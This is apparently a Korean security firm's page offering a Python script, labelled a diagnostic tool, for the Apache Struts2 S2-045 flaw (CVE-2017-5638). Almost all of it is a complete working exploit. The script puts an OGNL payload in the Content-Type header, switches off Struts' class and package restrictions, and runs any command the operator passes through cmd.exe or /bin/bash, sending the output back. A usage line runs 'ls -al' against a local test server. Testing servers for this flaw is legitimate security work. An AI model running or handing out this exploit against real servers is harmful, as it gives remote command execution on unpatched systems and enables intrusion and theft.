* 사업 등 관련 문의: T) 02-322-4688, F) 02-322-4646, E) info@wikisecurity.net

중국이 공격하는 Struts2 취약점(CVE 2017-5638 - Apache Struts2 S2-045) 진단 스크립트(Python)

(*) 출처: https://github.com/rapid7/metasploit-framework/issues/8064

* usage:

 $python struts2_S2-045.py <URL> <CMD>
 $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action "ls -al"


[ struts2_S2-045.py - Python Code ]

 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 
 import urllib2
 import httplib
 
 
 def exploit(url, cmd):
     payload = "%{(#_='multipart/form-data')."
     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
     payload += "(#_memberAccess?"
     payload += "(#_memberAccess=#dm):"
     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
     payload += "(#ognlUtil.getExcludedClasses().clear())."
     payload += "(#context.setMemberAccess(#dm))))."
     payload += "(#cmd='%s')." % cmd
     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
     payload += "(#ros.flush())}"
 
     try:
         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
         request = urllib2.Request(url, headers=headers)
         page = urllib2.urlopen(request).read()
     except httplib.IncompleteRead, e:
         page = e.partial
 
     print(page)
     return page
 
 
 if __name__ == '__main__':
     import sys
     if len(sys.argv) != 3:
         print("[*] struts2_S2-045.py <url> <cmd>")
     else:
         print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
         url = sys.argv[1]
         cmd = sys.argv[2]
         print("[*] cmd: %s\n" % cmd)
         exploit(url, cmd)